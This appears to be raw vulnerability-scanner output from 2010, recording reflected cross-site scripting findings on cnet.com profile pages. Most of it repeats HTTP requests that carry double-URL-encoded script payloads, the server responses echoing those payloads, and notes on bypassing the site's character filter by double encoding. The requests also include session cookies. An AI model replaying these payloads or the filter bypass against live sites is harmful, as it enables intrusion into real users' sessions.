GET /profile/caroline.mccarthy99027%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed014422ea0d/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:07:24 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:07:23 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=977 Connection: Keep-Alive Content-Length: 31134
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="caroline.mccarthy99027"><script>alert(1)</script>d014422ea0d"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1acec%253cscript%253ealert%25281%2529%253c%252fscript%253edd2c8ef73d1 was submitted in the REST URL parameter 2. This input was echoed as 1acec<script>alert(1)</script>dd2c8ef73d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/caroline.mccarthy1acec%253cscript%253ealert%25281%2529%253c%252fscript%253edd2c8ef73d1/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:07:25 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:07:25 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=945 Connection: Keep-Alive Content-Length: 31184
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>caroline.mccarthy1acec<script>alert(1)</script>dd2c8ef73d1's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 74681%253cscript%253ealert%25281%2529%253c%252fscript%253e3b29cca028a was submitted in the REST URL parameter 2. This input was echoed as 74681<script>alert(1)</script>3b29cca028a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/daverosenberg74681%253cscript%253ealert%25281%2529%253c%252fscript%253e3b29cca028a/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:13:18 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:13:19 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=990 Connection: Keep-Alive Content-Length: 31118
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>daverosenberg74681<script>alert(1)</script>3b29cca028a's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 196ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5c71f6a6858 was submitted in the REST URL parameter 2. This input was echoed as 196ab"><script>alert(1)</script>5c71f6a6858 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/daverosenberg196ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5c71f6a6858/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:13:17 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:13:17 GMT Edge-Control: no-cache Cneonction: close Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=996 Connection: Keep-Alive Content-Length: 31127
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="daverosenberg196ab"><script>alert(1)</script>5c71f6a6858"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6b026%253cscript%253ealert%25281%2529%253c%252fscript%253e6bb646481bb was submitted in the REST URL parameter 2. This input was echoed as 6b026<script>alert(1)</script>6bb646481bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/dcarnoy6b026%253cscript%253ealert%25281%2529%253c%252fscript%253e6bb646481bb/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:12:09 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:12:10 GMT Edge-Control: no-cache Cneonction: close Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=989 Connection: Keep-Alive Content-Length: 31043
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>dcarnoy6b026<script>alert(1)</script>6bb646481bb's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae3d0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee8b241de421 was submitted in the REST URL parameter 2. This input was echoed as ae3d0"><script>alert(1)</script>e8b241de421 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/dcarnoyae3d0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee8b241de421/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:12:08 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:12:09 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=982 Connection: Keep-Alive Content-Length: 31082
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="dcarnoyae3d0"><script>alert(1)</script>e8b241de421"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5abd0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9daa2b74cd6 was submitted in the REST URL parameter 2. This input was echoed as 5abd0"><script>alert(1)</script>9daa2b74cd6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/dd13reis5abd0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9daa2b74cd6/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:14:15 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:14:15 GMT Edge-Control: no-cache Cneonction: close Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=997 Connection: Keep-Alive Content-Length: 31093
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="dd13reis5abd0"><script>alert(1)</script>9daa2b74cd6"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3456e%253cscript%253ealert%25281%2529%253c%252fscript%253ed1b6c1111e was submitted in the REST URL parameter 2. This input was echoed as 3456e<script>alert(1)</script>d1b6c1111e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/dd13reis3456e%253cscript%253ealert%25281%2529%253c%252fscript%253ed1b6c1111e/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:14:17 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:14:17 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=959 Connection: Keep-Alive Content-Length: 31028
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>dd13reis3456e<script>alert(1)</script>d1b6c1111e's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d809%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e61fc2ce22b1 was submitted in the REST URL parameter 2. This input was echoed as 3d809"><script>alert(1)</script>61fc2ce22b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/declan003d809%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e61fc2ce22b1/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:07:34 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:07:34 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=934 Connection: Keep-Alive Content-Length: 31064
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="declan003d809"><script>alert(1)</script>61fc2ce22b1"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ba651%253cscript%253ealert%25281%2529%253c%252fscript%253ebc8079322cd was submitted in the REST URL parameter 2. This input was echoed as ba651<script>alert(1)</script>bc8079322cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/declan00ba651%253cscript%253ealert%25281%2529%253c%252fscript%253ebc8079322cd/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:07:35 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:07:35 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=862 Connection: Keep-Alive Content-Length: 31013
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>declan00ba651<script>alert(1)</script>bc8079322cd's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 34f7d%253cscript%253ealert%25281%2529%253c%252fscript%253efc7d096905d was submitted in the REST URL parameter 2. This input was echoed as 34f7d<script>alert(1)</script>fc7d096905d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/doreilly34f7d%253cscript%253ealert%25281%2529%253c%252fscript%253efc7d096905d/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:06:53 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:06:53 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=959 Connection: Keep-Alive Content-Length: 31084
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>doreilly34f7d<script>alert(1)</script>fc7d096905d's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5966d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e76e02de3b33 was submitted in the REST URL parameter 2. This input was echoed as 5966d"><script>alert(1)</script>76e02de3b33 in the application's response.
